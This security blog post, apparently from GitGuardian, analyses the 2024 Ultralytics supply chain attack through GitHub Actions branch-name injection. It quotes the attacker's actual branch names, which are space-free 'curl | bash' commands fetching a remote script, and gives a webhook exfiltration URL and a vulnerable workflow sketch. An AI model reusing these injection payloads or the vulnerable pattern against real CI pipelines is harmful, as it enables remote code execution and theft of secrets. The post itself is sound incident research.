The Ultralytics Supply Chain Attack: Connecting the Dots with GitGuardian’s Public Monitoring Data
On December 4, 2024, Ultralytics, a popular Python package for object detection and image segmentation, was backdoored to deploy XMRig, a cryptocurrency miner. The first compromised version was v8.3.41, followed by several others up to v8.3.46, indicating that the attacker managed to maintain their foothold for several days after the initial compromise.
The attacker abused git branch names to steal credentials, then uploaded a compromised Ultralytics package to PyPI. The initial access technique has been known, and documented, since 2021: it consists of exploiting insecure GitHub Actions workflows that interpolate user-controlled input, such as issue titles or branch names, into shell commands.
Let's take a look at the following example:
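This is a minimal sketch of such a workflow (hypothetical, not the actual Ultralytics workflow file): the pull request's source branch name is expanded directly inside a run step via `${{ github.head_ref }}`.

```yaml
# Hypothetical vulnerable workflow (illustrative sketch only).
name: greet-pr
on: pull_request_target   # privileged trigger: the job can also access secrets

jobs:
  greet:
    runs-on: ubuntu-latest
    steps:
      - name: Print the source branch
        # ${{ github.head_ref }} is the attacker-controlled branch name.
        # GitHub substitutes the expression textually into the script before
        # the shell runs it, so shell metacharacters in the branch name are
        # evaluated rather than just printed.
        run: |
          echo "Branch: ${{ github.head_ref }}"
```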
When the branch name is not malicious, it is simply displayed. However, if it contains a valid shell command such as `$(id)`, that command is executed and the user identifier appears in the Action's logs.
Following the first report of the incident, William Woodruff shared a very thorough investigation based on publicly available information and discussions with the community.
Since the attacker quickly deleted the payload files, branches, and other assets used in the attack, some important pieces are missing from this meticulous investigation. Because GitGuardian monitors everything that happens on public GitHub, scanning commits daily to detect leaked secrets and protect our customers, we still have access to those deleted files, branches, and commits.
This allows us to connect the dots.
Connecting the Dots
The repository exploitation was triggered from two pull requests, https://github.com/ultralytics/ultralytics/pull/18018 and https://github.com/ultralytics/ultralytics/pull/18020. They pointed to two branches of the malicious openimbot/openlytics repository, named `$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)` and `$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/d8daa0b26ae0c221aa4a8c20834c4dbfef2a9a14/file.sh}${IFS}|${IFS}bash)`. Those branches represented the attack vector.
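Git ref names cannot contain spaces, which explains the shape of these payloads: bash brace expansion and `${IFS}` are used to assemble a `curl ... | bash` command without a single space character. The hypothetical workflow below (ours, not the attacker's) reuses the same pattern with harmless commands to show how such a name expands once it reaches the runner's shell:

```yaml
# Hypothetical demo of the no-space pattern used in the malicious branch
# names, with harmless echo/cat standing in for the real curl | bash payload.
name: no-space-pattern-demo
on: workflow_dispatch

jobs:
  demo:
    runs-on: ubuntu-latest
    steps:
      - name: Expand a space-free command line
        # Inside the command substitution, brace expansion turns
        # {echo,hello,from,branch-name} into "echo hello from branch-name"
        # and each ${IFS} becomes whitespace, so the step prints:
        #   Branch: hello from branch-name
        # The real branch names expand the same way, into:
        #   curl -sSfL raw.githubusercontent.com/ultralytics/ultralytics/<sha>/file.sh | bash
        run: |
          echo "Branch: $({echo,hello,from,branch-name}${IFS}|${IFS}cat)"
```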
Each branch name referenced a file in a commit that supposedly contained a malicious payload used during the exploitation. One of the challenges faced during the initial analysis of the attack was that both those files were removed from GitHub following the incident.
Thanks to GitGuardian's dataset, we were able to recover the commit information and the files they reference.
As anticipated in Woodruff's analysis, the actual attack payload is a copy of the proof of concept from Adnan Khan's post on GitHub Actions cache poisoning. It uses the same Python memory-dumping tool and the same HTTP exfiltration channel. The data was exfiltrated to a temporary webhook, hxxps://webhook.site/9212d4ee-df58-41db-886a-98d180a912e6, which has since been deleted. We did not observe any other mention of this webhook across our GitHub dataset.
The second malicious pull request references a payload file with the same name, in another commit. Based on our investigation, we believe this commit was never pushed to GitHub.
The timeline of events for the first pull request, #18018, from 19:57 to 20:32, is as follows:
- Pull request opened from the malicious branch
- Payload file committed to the branch
- README update committed
- Commits pushed; the attack is triggered
- Force push; the attacker covers their traces
Because the commit hash had to be known before the branch could be created (the branch name itself references it), we assume the attackers kept local copies of the commits and pushed them to GitHub only after the pull request was opened. With this in mind, we believe that, once the first attack succeeded, the attackers never triggered the second exploitation.
Conclusion
Several GitHub Actions injection attacks have been exploited in recent years, often targeting machine learning repositories such as PyTorch or TensorFlow. Such attacks can have devastating consequences because of their supply chain nature.
The Ultralytics case is interesting because the attackers did not directly take advantage of the write access they had on the repository. They preferred to extract the CI/CD secrets instead, later using them to poison the build cache and deploy malicious releases. This emphasizes, once again, the prime importance of secrets as an attack vector, if not as an initial access vector.
Attacks on CI/CD pipelines can sometimes go unnoticed: when properly executed, they tend to leave few traces. By adding honeytokens to your CI/CD secrets, you can be alerted the moment an attacker tries to use them.
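As a concrete, hedged sketch of that idea in GitHub Actions: the secret names below are illustrative, and the decoy AWS key pair is assumed to have been generated with GitGuardian's honeytoken feature and stored as ordinary repository secrets.

```yaml
# Hedged sketch: planting a honeytoken next to real CI/CD secrets.
# HONEYTOKEN_AWS_ACCESS_KEY_ID / HONEYTOKEN_AWS_SECRET_ACCESS_KEY are
# illustrative names for a decoy key pair; they hold no real access.
name: build
on: [push]

jobs:
  build:
    runs-on: ubuntu-latest
    env:
      # An attacker who dumps the runner's environment or the repository's
      # secrets finds these decoys; any attempt to use them raises an alert.
      AWS_ACCESS_KEY_ID: ${{ secrets.HONEYTOKEN_AWS_ACCESS_KEY_ID }}
      AWS_SECRET_ACCESS_KEY: ${{ secrets.HONEYTOKEN_AWS_SECRET_ACCESS_KEY }}
    steps:
      - uses: actions/checkout@v4
      - name: Build
        run: make build
```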
This research wouldn't have been possible without GitGuardian's Public Monitoring Data, which collects and scans billions of commits on GitHub to detect and alert on exposed secrets. By proactively notifying developers, we help prevent breaches at their earliest stage.